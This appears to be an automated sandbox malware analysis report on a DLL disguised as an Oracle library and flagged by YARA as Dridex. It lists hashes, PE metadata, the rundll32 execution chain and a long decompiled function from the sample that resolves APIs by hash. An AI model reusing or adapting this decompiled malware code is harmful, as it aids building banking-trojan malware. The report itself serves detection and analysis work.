Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.2.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A99.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	4.456271044628655
Encrypted:	false
SSDEEP:	48:cvIwSD8zshJgtWI90iWSC8B08fm8M4JCdsFVhFJI+q8/ixBDT4SrSzd:uITfzfjSNzJXInDWzd
MD5:	97D5E5C429E501CDFFC1EDDD74F03C0E
SHA1:	56F18A0CF351D3E5E9BD5C8D6B1A622D2EE90C9A
SHA-256:	4A3585E5098B4F3A20D5279F912E53AABB97FDFF87795C05310F556D50848939
SHA-512:	B2A77602384D2AB9EA05B5A4187820A9A481A9F7A67BE02278EFA44EEA8F7F4B5229D44E5E9C2FDCA8FED2049523D0F4B536D9804A563E4EBD6E501BF87DA9DA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309789" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.266874608470625
Encrypted:	false
SSDEEP:	12288:l51biu1n511dzd9szTzpn8H3WjMHOimPCb+QCwt9/VUbe36/U31DAQFtla:pbiu1n511dzd9szRwBHl
MD5:	CAF2F8B9D7AF18D4566B79CA3933F5A4
SHA1:	7E58E82C13A0D5CEE2933E2604CD970066CFF2A5
SHA-256:	20E010FA85B46E77D05FBD8FC198DBC18551944B587A2C7327D7E8A79CB0094A
SHA-512:	7553DF8548C163035E18E3AA16B7F733F615B2992FC0C4AF984C22B9B107C2E8140321CDD58ADDD0F8757DE0CDC4AE39A899ED148F07D08E4F9C728FACFB8A0C
Malicious:	false
Reputation:	low
Preview:	regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....................................................................................................................................................................................................................................................................................................................................................Q..Y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.837340500572527
Encrypted:	false
SSDEEP:	384:j49s5uZrd4dXX5oQp8XXLnxOf2o2PmxwpP5GjZmGueDTTeA5N5AAR1Gm:09acrmXXZpigf2olxwpxWmGukTeEN5Ni
MD5:	BAB3BD752B41FBBAB695F1FA3D2E5D9D
SHA1:	1B305D2AE307B9576B2DA3A90821B4CA36E047BC
SHA-256:	BBE75947BA8A0D90749FDC30CEF8004F3303DC6DAB4E386827A70A35FE09C471
SHA-512:	E5B128B8A6C9894D35BF300CA40BA9518F40D33C783CB3038B7B6A73E278E5AF4431814A3012DD70E2042FCBBD5067AEE6B89A1EA6C1E1E66713677F9815F7E0
Malicious:	false
Reputation:	low
Preview:	regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....................................................................................................................................................................................................................................................................................................................................................W..YHvLE.^......P...........9.....e~..`.?.bv............................. ..hbin................p.\..,..........nk,..J!.........@........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..J!......... ...........P............... .......Z.......................Root........lf......Root....nk ..J!......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.27464572912174
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	triage_dropped_file.dll
File size:	565248
MD5:	d756b468c3ee8d401d53f986e12bc87c
SHA1:	300868849d964a669c6aa9598392b7851425c305
SHA256:	766ccb30a7a7c89062dd95f241a2c889bd88b41345eb8939bf6525b73391141d
SHA512:	5ecfe749266b2fb45a56533a23d5aec68a00182fe60081c40566a58966d029b325ed1b75f8bcd94f6794eea698c7b8c0a76a19b43c3099ea1c1041b7bc56fc04
SSDEEP:	6144:sKZLFaLQvUKc+uIqM/7xg48FVKs4JzFWllUdZadh0hFmdV49DUdz2nBsN:sOFaLQvUKc+uIqMt6HKBqq8wkg4+i
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004af0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C34724 [Wed Dec 22 15:41:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5f45311a6d98808219a965e86f018be2

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F815C995301h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000088h
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [esp+7Ch]
mov dword ptr [esp+78h], 397D707Dh
mov edx, dword ptr [esp+70h]
mov esi, dword ptr [esp+74h]
mov dword ptr [esp+38h], eax
mov dword ptr [esp+34h], ecx
mov dword ptr [esp+30h], edx
mov dword ptr [esp+2Ch], esi
call 00007F815C998D1Ah
mov ecx, eax
mov dword ptr [esp+7Ch], 10867E3Dh
mov edx, eax
mov esi, dword ptr [eax+3Ch]
mov edi, eax
add edi, esi
mov bl, byte ptr [esp+00000083h]
mov eax, dword ptr [eax+esi]
xor esi, esi
sub eax, 00004550h
mov dword ptr [esp+28h], eax
mov eax, dword ptr [esp+30h]

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x810a9	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8110c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x1174	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x643e	0x7000	False	0.356619698661	data	4.19242521182	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x79895	0x7a000	False	0.303726946721	data	7.37216819642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x62c8	0x5000	False	0.247705078125	data	5.07498564538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x53d	0x1000	False	0.09033203125	data	0.788492020975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x1174	0x2000	False	0.242309570312	data	4.16465388374	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
USER32.dll	GetWindowTextA
ADVAPI32.dll	RegCloseKey, AccessCheck, QueryServiceStatusEx
KERNEL32.dll	CloseHandle, GetModuleHandleW, IsDebuggerPresent, OutputDebugStringA, GetModuleFileNameW, GetFileSize
WS2_32.dll	WSACleanup
WINSPOOL.DRV	EnumFormsW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3216 Parent PID: 6088

General

Start time:	20:38:59
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll"
Imagebase:	0x1080000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 900 Parent PID: 3216

General

Start time:	20:38:59
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1928 Parent PID: 900

General

Start time:	20:39:00
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Imagebase:	0x100000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.259136182.000000006EF41000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.256603850.000000006EF41000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.289153535.000000006EF41000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6168 Parent PID: 1928

General

Start time:	20:39:04
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 684
Imagebase:	0xec0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 3216 Parent PID: 6088 loaddll32.exeCOMMON

Executed Functions

Function 6EF50730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6EF50730(void* __ecx) {
				void* __esi;
				signed int _t164;
				signed char* _t168;
				char _t171;
				signed int _t189;
				intOrPtr _t198;
				char _t199;
				signed int _t205;
				signed int _t209;
				signed int _t212;
				void* _t221;
				void* _t222;
				signed int _t224;
				signed int _t225;
				signed int _t232;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t256;
				signed int _t259;
				signed int _t263;
				signed int _t268;
				signed int _t274;
				int _t298;
				intOrPtr* _t301;
				signed char _t304;
				signed char _t305;
				void* _t309;
				signed int _t330;
				intOrPtr* _t335;
				signed char _t358;
				intOrPtr* _t373;
				char _t374;
				intOrPtr* _t382;
				signed int _t387;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t410;
				signed int _t411;
				signed int _t413;
				intOrPtr* _t416;
				signed int _t418;
				void* _t421;
				void* _t422;
				signed int _t427;
				intOrPtr* _t430;
				void* _t432;
				void* _t435;
				void* _t436;

				_t421 = __ecx;
				_t164 =  *0x6ef5d1f8;
				if(_t164 == 0x4c71e88d) {
					_t164 = E6EF5361C(0x30);
					 *0x6ef5d1f8 = _t164;
				}
				if( *((char*)(_t164 + 0xb)) == 0 || _t421 != 0) {
					_t422 = _t435 + 0x48;
					E6EF53698(_t422, 0, 0x11c);
					_t436 = _t435 + 0xc;
					 *((intOrPtr*)(_t436 + 0x48)) = 0x11c;
					if(E6EF5306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t422);
						asm("int3");
						asm("int3");
					}
					_t411 =  *0x6ef5d1f8;
					_t168 = _t436 + 0x4c;
					_t304 =  *_t168;
					 *(_t411 + 8) = _t304;
					_t305 = _t168[4];
					 *(_t411 + 9) = _t305;
					 *((char*)(_t411 + 0xa)) = _t168[0x110];
					 *((intOrPtr*)(_t411 + 4)) =  *((intOrPtr*)(_t436 + 0x54));
					 *((char*)(_t411 + 0xc)) = 0 | _t168[0x116] != 0x00000001;
					 *_t411 = (_t305 & 0x000000ff) + ((_t304 & 0x000000ff) << 4) - 0x50;
					_t171 = E6EF50FF8(_t411);
					 *(_t436 + 0x198) = 0;
					 *((char*)( *0x6ef5d1f8 + 0xb)) = _t171;
					_t373 = E6EF5306C(0x150c05fc, 0x1da4d409, _t171, _t171);
					if(_t373 == 0) {
						L12:
						_t374 = 0;
						 *((char*)( *0x6ef5d1f8 + 0x28)) = _t374;
						if( *((intOrPtr*)(E6EF50730(0))) >= 0x10) {
							_t309 = 6;
							memcpy(_t436 + 0x164, 0x6ef5bce0, 0 << 2);
							_t436 = _t436 + 0xc;
							_t410 = 0x6ef5bce0 + _t309 + _t309;
							 *((intOrPtr*)(_t436 + 0x1c)) = 0;
							E6EF4F584(_t436 + 0x24, 0);
							_t413 = 0;
							__eflags = 0;
							do {
								E6EF4F828(_t436 + 0x24, E6EF4F4CC(_t436 + 0x20) + 4);
								 *((intOrPtr*)(E6EF4F4BC(_t436 + 0x24, E6EF4F4CC(_t436 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t436 + 0x164 + _t413 * 4));
								_t413 = _t413 + 1;
								 *((intOrPtr*)(_t436 + 0x1c)) =  *((intOrPtr*)(_t436 + 0x1c)) + 1;
								__eflags = _t413 - 6;
							} while (_t413 < 6);
							_push(0);
							E6EF55580(_t436 + 0xc, _t436 + 0x1c, 0x80000002);
							E6EF4F654(_t436 + 0x20);
							E6EF555B0(_t436 + 8, _t436 + 0x1c0, 0xc0092a94);
							_t189 = E6EF55864(_t436 + 4, __eflags,  *((intOrPtr*)(_t436 + 0x1c0)));
							_t414 = _t189;
							E6EF4DFA4(_t436 + 0x1c0);
							__eflags = _t189;
							if(_t189 != 0) {
								E6EF555B0(_t436 + 8, _t436 + 0x1c8, 0x1e55aaec);
								_t427 = E6EF55864(_t436 + 4, __eflags,  *((intOrPtr*)(_t436 + 0x1c8)));
								E6EF4DFA4(_t436 + 0x1c8);
								_t414 = _t436 + 0x1d0;
								E6EF555B0(_t436 + 8, _t436 + 0x1d0, 0x360d0c74);
								_t410 = E6EF55864(_t436 + 4, __eflags,  *(_t436 + 0x1d0));
								E6EF4DFA4(_t436 + 0x1d0);
								__eflags = _t427;
								if(_t427 != 0) {
									__eflags = _t427 - 5;
									if(_t427 != 5) {
										__eflags = _t427 - 2;
										if(_t427 != 2) {
											L58:
											E6EF4CFDC(_t436 + 0xc);
											__eflags =  *((char*)(_t436 + 8));
											if( *((char*)(_t436 + 8)) == 0) {
												L65:
												_t198 = 0;
												__eflags = 0;
												 *(_t436 + 4) = 0;
												goto L66;
											}
											_t392 =  *(_t436 + 4);
											__eflags = _t392;
											if(_t392 == 0) {
												L61:
												_t247 = 1;
												L63:
												__eflags = _t247;
												if(_t247 == 0) {
													E6EF55558(_t392);
												}
												goto L65;
											}
											__eflags = _t392 - 0xffffffff;
											if(_t392 != 0xffffffff) {
												_t247 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t410 - 1;
										if(_t410 != 1) {
											goto L58;
										}
										E6EF4CFDC(_t436 + 0xc);
										__eflags =  *((char*)(_t436 + 8));
										if( *((char*)(_t436 + 8)) == 0) {
											L57:
											 *(_t436 + 4) = 0;
											_t198 = 5;
											goto L66;
										}
										_t393 =  *(_t436 + 4);
										__eflags = _t393;
										if(_t393 == 0) {
											L53:
											_t250 = 1;
											L55:
											__eflags = _t250;
											if(_t250 == 0) {
												E6EF55558(_t393);
											}
											goto L57;
										}
										__eflags = _t393 - 0xffffffff;
										if(_t393 != 0xffffffff) {
											_t250 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t410;
									if(_t410 != 0) {
										__eflags = _t410 - 1;
										if(_t410 == 1) {
											E6EF4CFDC(_t436 + 0xc);
											__eflags =  *((char*)(_t436 + 8));
											if( *((char*)(_t436 + 8)) == 0) {
												L122:
												 *(_t436 + 4) = 0;
												_t198 = 4;
												goto L66;
											}
											_t394 =  *(_t436 + 4);
											__eflags = _t394;
											if(_t394 == 0) {
												L118:
												_t253 = 1;
												L120:
												__eflags = _t253;
												if(_t253 == 0) {
													E6EF55558(_t394);
												}
												goto L122;
											}
											__eflags = _t394 - 0xffffffff;
											if(_t394 != 0xffffffff) {
												_t253 = 0;
												__eflags = 0;
												goto L120;
											}
											goto L118;
										}
										goto L58;
									}
									E6EF4CFDC(_t436 + 0xc);
									__eflags =  *((char*)(_t436 + 8));
									if( *((char*)(_t436 + 8)) == 0) {
										L45:
										 *(_t436 + 4) = 0;
										_t198 = 3;
										goto L66;
									}
									_t395 =  *(_t436 + 4);
									__eflags = _t395;
									if(_t395 == 0) {
										L41:
										_t256 = 1;
										L43:
										__eflags = _t256;
										if(_t256 == 0) {
											E6EF55558(_t395);
										}
										goto L45;
									}
									__eflags = _t395 - 0xffffffff;
									if(_t395 != 0xffffffff) {
										_t256 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t410;
								if(_t410 != 0) {
									goto L58;
								}
								E6EF4CFDC(_t436 + 0xc);
								__eflags =  *((char*)(_t436 + 8));
								if( *((char*)(_t436 + 8)) == 0) {
									L35:
									 *(_t436 + 4) = 0;
									_t198 = 2;
									goto L66;
								}
								_t396 =  *(_t436 + 4);
								__eflags = _t396;
								if(_t396 == 0) {
									L31:
									_t259 = 1;
									L33:
									__eflags = _t259;
									if(_t259 == 0) {
										E6EF55558(_t396);
									}
									goto L35;
								}
								__eflags = _t396 - 0xffffffff;
								if(_t396 != 0xffffffff) {
									_t259 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6EF4CFDC(_t436 + 0xc);
							__eflags =  *((char*)(_t436 + 8));
							if( *((char*)(_t436 + 8)) == 0) {
								L25:
								 *(_t436 + 4) = 0;
								_t198 = 1;
								goto L66;
							}
							_t397 =  *(_t436 + 4);
							__eflags = _t397;
							if(_t397 == 0) {
								L21:
								_t263 = 1;
								L23:
								__eflags = _t263;
								if(_t263 == 0) {
									E6EF55558(_t397);
								}
								goto L25;
							}
							__eflags = _t397 - 0xffffffff;
							if(_t397 != 0xffffffff) {
								_t263 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t198 = 1;
							L66:
							 *((intOrPtr*)( *0x6ef5d1f8 + 0x24)) = _t198;
							_t199 = E6EF51030(0xffffffffffffffff);
							_t330 =  *0x6ef5d1f8;
							 *((char*)(_t330 + 0x29)) = _t199;
							 *((intOrPtr*)(_t330 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t330 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6ef5d1f8 + 0x2c)) = E6EF510A4(0xffffffffffffffff);
								L78:
								if(E6EF5306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t436 + 0x164); // executed
								}
								_t205 =  *0x6ef5d1f8;
								_t301 = _t436 + 0x178;
								_t416 = _t436 + 0x170;
								 *((short*)(_t205 + 0xe)) =  *_t301;
								 *((intOrPtr*)(_t205 + 0x10)) =  *((intOrPtr*)(_t301 - 0x10));
								 *((intOrPtr*)(_t205 + 0x14)) =  *((intOrPtr*)(_t301 - 0xc));
								 *((intOrPtr*)(_t205 + 0x18)) =  *_t416;
								 *((intOrPtr*)(_t205 + 0x1c)) =  *((intOrPtr*)(_t416 + 0x10));
								return _t205;
							}
							 *(_t436 + 0x19c) = 0;
							_t382 = E6EF5306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t382 == 0) {
								L74:
								_t209 =  *0x6ef5d1f8;
								if( *((char*)(_t209 + 0x28)) == 0) {
									 *((intOrPtr*)(_t209 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t209 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t436 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t382() == 0) {
								_t212 = E6EF535F0(_t414);
								__eflags = _t212;
								if(_t212 != 0) {
									goto L74;
								}
							}
							 *(_t436 + 0x30) =  *(_t436 + 0x19c);
							 *((char*)(_t436 + 0x34)) = 1;
							 *(_t436 + 0x1a4) = 0;
							_t335 = E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t335 != 0) {
								_push(_t436 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t436 + 0x1ac));
								if( *_t335() == 0) {
									E6EF535F0(_t414);
								}
							}
							_t215 =  *(_t436 + 0x1a4);
							if( *(_t436 + 0x1a4) != 0) {
								E6EF4F584(_t436 + 0x18c, _t215);
								_t418 = E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t418;
								if(_t418 == 0) {
									L135:
									E6EF4F654(_t436 + 0x188);
									goto L72;
								}
								_t221 = E6EF4F4BC(_t436 + 0x18c, 0);
								_t222 = E6EF4F4CC(_t436 + 0x188);
								_t224 =  *_t418( *(_t436 + 0x1ac), 1, _t221, _t222, _t436 + 0x1a4);
								__eflags = _t224;
								if(_t224 == 0) {
									_t225 = E6EF535F0(_t418);
									__eflags = _t225;
									if(_t225 != 0) {
										goto L135;
									}
								}
								_t430 = E6EF4F4BC(_t436 + 0x18c, 0);
								E6EF4DF4C(_t436 + 0x1b4, 0);
								 *(_t436 + 0x1ac) = 0;
								_t387 = E6EF5306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t387;
								if(_t387 != 0) {
									 *_t387( *_t430, _t436 + 0x1ac);
								}
								E6EF4DFC0(_t436 + 0x1b4,  *(_t436 + 0x1ac));
								_t232 = E6EF5306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t232;
								if(_t232 != 0) {
									_push( *(_t436 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6EF4E06C(_t436 + 0x1b8 - 8, _t436 + 0x1b8);
								_t432 = E6EF54FFC( *((intOrPtr*)(_t436 + 0x1b8)), E6EF4E8A8( *((intOrPtr*)(_t436 + 0x1b8)), 0x7fffffff));
								E6EF4DFA4(_t436 + 0x1b8);
								E6EF4DFA4(_t436 + 0x1b0);
								E6EF4F654(_t436 + 0x188);
								__eflags =  *((char*)(_t436 + 0x34));
								if( *((char*)(_t436 + 0x34)) != 0) {
									E6EF4BB44(_t436 + 0x30);
								}
								__eflags = _t432 - 0x6df4cf7;
								__eflags =  *(_t410 + 0x377ae8fc6) & 0xfc54850f;
								asm("invalid");
							} else {
								L72:
								if( *((char*)(_t436 + 0x34)) != 0) {
									E6EF4BB44(_t436 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t436 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t373() == 0) {
						_t268 = E6EF535F0(_t411);
						__eflags = _t268;
						if(_t268 != 0) {
							goto L12;
						}
					}
					 *(_t436 + 0x14) =  *(_t436 + 0x198);
					 *((char*)(_t436 + 0x18)) = 1;
					 *(_t436 + 0x1a0) = 0;
					if(E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t298 = GetTokenInformation( *(_t436 + 0x1a8), 2, 0, 0, _t436 + 0x1a0); // executed
						if(_t298 == 0) {
							E6EF535F0(_t411);
						}
					}
					_t271 =  *(_t436 + 0x1a0);
					if( *(_t436 + 0x1a0) != 0) {
						_t358 = _t436 + 0x3c;
						E6EF4F584(_t358, _t271);
